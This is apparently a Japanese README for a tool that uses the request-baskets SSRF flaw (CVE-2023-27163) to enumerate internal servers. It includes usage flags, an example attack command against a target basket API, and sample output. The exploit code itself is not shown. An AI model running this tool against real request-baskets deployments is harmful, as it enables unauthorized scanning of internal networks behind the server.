
上海交通大学の@beet1e(https://github.com/b33t1e) と山東大学の@chenlibo147、@houqinsheng、[email protected] に感謝します。
SSRF脆弱性 (CVE-2023-27163) の詳細については、https://notes.sjtu.edu.cn/s/MUUhEymt7# をご確認ください。
このコードは、request-baskets の SSRF を使用して内部サーバーを列挙するためのものです。
何か間違っている点や調整が必要な点があれば、お気軽に [email protected] までお知らせください。
ありがとうございます。
使用方法 -w - ワードリスト -target - バスケットを追加するためのrequest basket API URLを含むターゲットURL -dynamic - 内部サーバーを表示するために作成したいリンクの名前 -internal_target - 内部ターゲットURL -ms - ミリ秒
例: -w raft-test.txt -target "http://10.10.10.5:55555/api/baskets/" -dynamic "test" -internal_target "http://120.0.0.1/"
標準出力は次のようになります:
ページリンク: web
コンテンツ長: 2394
リクエスト先URL: http://10.10.10.5:55555/test48